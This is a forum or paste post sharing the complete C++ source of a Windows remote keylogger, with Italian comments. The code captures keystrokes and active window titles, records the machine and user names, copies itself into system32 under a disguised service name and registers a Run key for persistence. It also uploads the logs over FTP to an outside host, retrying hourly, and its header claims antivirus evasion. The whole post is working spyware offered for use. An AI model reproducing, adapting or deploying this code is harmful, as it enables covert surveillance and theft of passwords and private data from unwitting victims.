nice little keylogger

Posted by Anonymous on Thu 10 Sep 01:30

1. /*
2. *************************************************************************
3. *  __GiReX__ Remote KeyLogger 2.0     MODIFICATO BY cr4sh_0v3rr1d3      *
4. *    Linguaggio: C++                                                    *
5. *    Features: Keylogger Remoto                                         *
6. *   - Logga tutto, e la maggior parte delle combinazioni da tastiera    *
7. *   - Con un apposita aggiunta alle chiavi di reg. si autoavvia con Win *
8. *   - INVIO LOG TRAMITE FTP                        *
9. *   - Se fallisce, ritenta ogni 60 MINUTI di rinviare il log            *
10. *   - Una volta inviato il vecchio log viene cancellato dal PC vittima  *
11. *   - Non rilevato dagli AntiVirus                                      *
12. *************************************************************************
13. */
14.  
15. #include <windows.h>
16. #include <iostream>
17. #include <cstring>
18. #include <ctime>
19. #include <fstream>
20. #include <stdio.h>
21. #include <time.h>
22. #include <curl/curl.h>
23. #include <sys/types.h>
24. #include <sys/stat.h>
25. #include <string.h>
26.  
27. #define PRESSED -32767
28. #define LOCAL_FILE      "c:\\windows\\system32\\log.txt"
29. #define UPLOAD_FILE_AS  "log.txt"
30. #define REMOTE_URL      "ftp://jumpers.netsons.org/"  UPLOAD_FILE_AS
31. #define RENAME_FILE_TO  "renamed-and-fine.txt"
32.  
33. using namespace std;
34.  
35. void nascondi();
36. void StartLog();
37. bool upload();
38. void chkSend();
39. void RegistraAndSposta();
40. void logga(char *stringa);
41. void logga(char carattere); // OVERLOAD
42. ofstream log; //File di LOG
43. char prog[25] = "winservice.exe"; // Dare il nome che ha l'exe
44. char key_dir[255], log_dir[255]; // Destinazione keylogger (mette entrambi i file in system32 del user)
45. bool inviato = FALSE;
46.  
47. static size_t read_callback(void *ptr, size_t size, size_t nmemb, void *stream)
48. {
49.   /* in real-world cases, this would probably get this data differently
50.      as this fread() stuff is exactly what the library already would do
51.      by default internally */
52.   size_t retcode = fread(ptr, size, nmemb, stream);
53.  
54.   fprintf(stderr, "*** We read %d bytes from file\n", retcode);
55.   return retcode;
56. }
57.  
58. int main(int argc, char *argv[])
59. {
60.     int i = 0;
61.     HWND finestra;
62.     char titolo_finestra[255], last_titolo[255];
63.      RegistraAndSposta();
64.       strcpy(log_dir, key_dir);
65.        strcat(log_dir, "\\log.txt");
66.  
67.      //nascondi();
68.      StartLog();
69.      inviato = upload();
70.  
71.       while(1) {
72.       finestra = GetForegroundWindow();  // Ricevo l'indirizzo della finestra del programma
73.         GetWindowText(finestra, titolo_finestra, sizeof(titolo_finestra));
74.          if(strcmp(titolo_finestra, last_titolo) && titolo_finestra[0]!= '\0')
75.           {
76.              logga("\n\n==\tFinestra:  ");
77.              logga(titolo_finestra);
78.              logga("\t==\n\n");
79.           }  strcpy(last_titolo, titolo_finestra);
80.     if(GetAsyncKeyState(VK_SHIFT)) { // LOGGO CARATTERI SE SHIFT E' PREMUTO
81.       for(i = 65; i<= 90; i++) {
82.         if(GetAsyncKeyState(i)== PRESSED) logga(i);
83.         }
84.           for(i = 48; i <= 57; i++) {// CARATTERI SPECIALI --> =!"�$%&/() <--
85.             if(GetAsyncKeyState(i) == PRESSED) {
86.               if(i==48) logga(61);
87.                 else if(i==51) logga(163);
88.                  else if(i==55) logga(47);
89.                   else logga(i-16);
90.             }
91.         }
92.          if(GetAsyncKeyState(220) == PRESSED) logga('|');
93.          if(GetAsyncKeyState(188) == PRESSED) logga(';');
94.          if(GetAsyncKeyState(190) == PRESSED) logga(':');
95.          if(GetAsyncKeyState(189) == PRESSED) logga('_');
96.          if(GetAsyncKeyState(186) == PRESSED) logga('�');
97.          if(GetAsyncKeyState(187) == PRESSED) logga('*');
98.          if(GetAsyncKeyState(192) == PRESSED) logga('�');
99.          if(GetAsyncKeyState(222) == PRESSED) logga('�');
100.          if(GetAsyncKeyState(191) == PRESSED) logga('�');
101.          if(GetAsyncKeyState(219) == PRESSED) logga('?');
102.          if(GetAsyncKeyState(221) == PRESSED) logga('^');
103.          if(GetAsyncKeyState(226) == PRESSED) logga('>');
104.     }  // END IF (se shift � premuto)
105.  
106.           else {  //  LOGGO CARATTERI SE SHIFT NON E' PREMUTO
107.             for (i = 65; i <= 90; i++) {
108.               if (GetAsyncKeyState(i)  == PRESSED) logga(i+32);  // LETTERE
109.           }
110.  
111.             for(i = 48; i <= 57; i++) {   //  NUMERI
112.               if(GetAsyncKeyState(i) == PRESSED) logga(i);
113.           }
114.         /*           ALCUNI CARATTERI SPECIALI          */
115.             if(GetAsyncKeyState(220) == PRESSED) logga('\\');
116.             if(GetAsyncKeyState(188) == PRESSED) logga(',');
117.             if(GetAsyncKeyState(190) == PRESSED) logga('.');
118.             if(GetAsyncKeyState(189) == PRESSED) logga('-');
119.             if(GetAsyncKeyState(186) == PRESSED) logga('�');
120.             if(GetAsyncKeyState(187) == PRESSED) logga('+');
121.             if(GetAsyncKeyState(192) == PRESSED) logga('�');
122.             if(GetAsyncKeyState(222) == PRESSED) logga('�');
123.             if(GetAsyncKeyState(191) == PRESSED) logga('�');
124.             if(GetAsyncKeyState(219) == PRESSED) logga('\'');
125.             if(GetAsyncKeyState(221) == PRESSED) logga('�');
126.             if(GetAsyncKeyState(226) == PRESSED) logga('<');
127.             if(GetAsyncKeyState(111) == PRESSED) logga('/');
128.             if(GetAsyncKeyState(106) == PRESSED) logga('*');
129.             if(GetAsyncKeyState(109) == PRESSED) logga('-');
130.             if(GetAsyncKeyState(107) == PRESSED) logga('+');
131.             if(GetAsyncKeyState(110) == PRESSED) logga('.');
132.         /*           TASTI FUNZIONALI (loggo char*)        */
133.             if(GetAsyncKeyState(VK_CAPITAL) == PRESSED) logga("<CPSLCK>");
134.             if(GetAsyncKeyState(VK_BACK) == PRESSED) logga("<BK>");
135.             if(GetAsyncKeyState(VK_DELETE) == PRESSED) logga("<DEL>");
136.             if(GetAsyncKeyState(VK_ESCAPE) == PRESSED) logga("<ESC>");
137.             if(GetAsyncKeyState(VK_HOME) == PRESSED) logga("<HOME>");
138.             if(GetAsyncKeyState(VK_END) == PRESSED) logga("<END>");
139.             if(GetAsyncKeyState(VK_INSERT) == PRESSED) logga("<INS>");
140.             if(GetAsyncKeyState(VK_TAB) == PRESSED) logga("<TAB>");
141.             if(GetAsyncKeyState(VK_LEFT) == PRESSED) logga("<LEFT>");
142.             if(GetAsyncKeyState(VK_RIGHT) == PRESSED) logga("<RIGHT>");
143.             if(GetAsyncKeyState(VK_UP) == PRESSED) logga("<UP>");
144.             if(GetAsyncKeyState(VK_DOWN) == PRESSED) logga("<DOWN>");
145.         /*           SPAZIO E A CAPO           */
146.             if(GetAsyncKeyState(VK_SPACE) == PRESSED) logga(" ");
147.             if(GetAsyncKeyState(VK_RETURN) == PRESSED) logga("\t<INVIO>\n");
148.         }
149.        Sleep(10);
150.        chkSend();       // CONTROLLO SE IL FILE E' STATO UPPATO
151.       }
152.  
153.   return 0;
154. }
155.  
156. void StartLog()
157. {
158.   char user[50], pcname[50], ora[50];
159.   DWORD buffSize = 50;
160.    GetComputerName(pcname, &buffSize);  // Ottengo il nome del computer
161.    GetUserName(user,&buffSize);  // Ottengo l'username
162.  
163.   time_t startTime;
164.    time(&startTime);  // Ottengo il localtime
165.     strcpy(ora, ctime(&startTime));  // Lo converto in stringa
166.  
167.     logga("\t--> KEYLOGGER AVVIATO <--\n\n"); // Loggo le varie info
168.      logga("Nome del computer:\t");
169.       logga(pcname);
170.      logga("\nUsername:\t\t");
171.       logga(user);
172.      logga("\nStartup Time:\t\t");
173.       logga(ora);
174.        logga("\n\n");
175. }
176.  
177. void RegistraAndSposta()
178. {
179. char moved[255];
180.   GetSystemDirectory(key_dir, sizeof(key_dir));  // Prendo il percorso della dir system32
181.    strcpy(moved, key_dir);
182.    strcat(moved, "\\");
183.    strcat(moved, prog);
184.     CopyFile(prog, moved, 1);  // COPIO il keylogger in system32
185.  
186.   HKEY chiave;  // Mofifico le chiavi di registro (run) in modo che parta all'avvio
187.    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&chiave);
188.     RegSetValueEx(chiave, "winservice.exe",0,REG_SZ,(const unsigned char*)moved,sizeof(moved));                //<<<----------- qua e da modificare il                                                                                                                                                                                   //nome del file
189.   RegCloseKey(chiave);
190. }
191.  
192. void nascondi()
193. {
194.   HWND invisibile;
195.     invisibile = FindWindow("ConsoleWindowClass", NULL); // Ricevo valore finestra
196.      ShowWindow(invisibile, SW_HIDE);     //     Nascondo finestra
197. }
198.  
199. void logga(char carattere) // Loggo caratteri
200. {
201.     log.open(log_dir, ios::app);
202.       log << carattere;
203.     log.close();
204. }
205.  
206. void logga(char *stringa) // Loggo Stringhe (char*)
207. {
208.      log.open(log_dir, ios::app);
209.       log << stringa;
210.      log.close();
211. }
212.  
213. bool upload() {
214.   CURL *curl;
215.   CURLcode res;
216.   FILE *hd_src;
217.   struct stat file_info;
218.   curl_off_t fsize;
219.  
220.   struct curl_slist *headerlist=NULL;
221.   static const char buf_1 [] = "RNFR " UPLOAD_FILE_AS;
222.   static const char buf_2 [] = "RNTO " RENAME_FILE_TO;
223.  
224.   /* get the file size of the local file */
225.   if(stat(LOCAL_FILE, &file_info)) {
226.     printf("Couldnt open '%s': %s\n", LOCAL_FILE, strerror(errno));
227.     return false;
228.   }
229.   fsize = (curl_off_t)file_info.st_size;
230.  
231.   printf("Local file size: %" CURL_FORMAT_CURL_OFF_T " bytes.\n", fsize);
232.  
233.   /* get a FILE * of the same file */
234.   hd_src = fopen(LOCAL_FILE, "rb");
235.  
236.   /* In windows, this will init the winsock stuff */
237.   curl_global_init(CURL_GLOBAL_ALL);
238.  
239.   /* get a curl handle */
240.   curl = curl_easy_init();
241.   if(curl) {
242.     /* build a list of commands to pass to libcurl */
243.     headerlist = curl_slist_append(headerlist, buf_1);
244.     headerlist = curl_slist_append(headerlist, buf_2);
245.  
246.     /* we want to use our own read function */
247.     curl_easy_setopt(curl, CURLOPT_READFUNCTION, read_callback);
248.  
249.     /* enable uploading */
250.     curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
251.  
252.     /* specify target */
253.     curl_easy_setopt(curl,CURLOPT_URL, REMOTE_URL);
254.  
255.     /* pass in that last of FTP commands to run after the transfer */
256.     curl_easy_setopt(curl, CURLOPT_POSTQUOTE, headerlist);
257.  
258.     /* now specify which file to upload */
259.     curl_easy_setopt(curl, CURLOPT_READDATA, hd_src);
260.  
261.     /* Set the size of the file to upload (optional).  If you give a *_LARGE
262.        option you MUST make sure that the type of the passed-in argument is a
263.        curl_off_t. If you use CURLOPT_INFILESIZE (without _LARGE) you must
264.        make sure that to pass in a type 'long' argument. */
265.     curl_easy_setopt(curl, CURLOPT_INFILESIZE_LARGE,
266.                      (curl_off_t)fsize);
267.  
268.     /* Now run off and do what you've been told! */
269.     res = curl_easy_perform(curl);
270.  
271.     /* clean up the FTP commands list */
272.     curl_slist_free_all (headerlist);
273.  
274.     /* always cleanup */
275.     curl_easy_cleanup(curl);
276.   }
277.   fclose(hd_src); /* close the local file */
278.  
279.   curl_global_cleanup();
280.   return true;
281.  
282. }
283.  
284.  
285. void chkSend()
286. {
287.   if(inviato==TRUE) return;
288.   else {
289.  
290.    struct tm *orario;
291.    time_t lt;
292.    int min;
293.  
294.    lt = time(NULL);
295.     orario = localtime(&lt);
296.       min = orario->tm_min;
297.        if(min==0) inviato = upload();
298.     }
299. }

The paste: http://pastebin.com/m560a9f66

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
•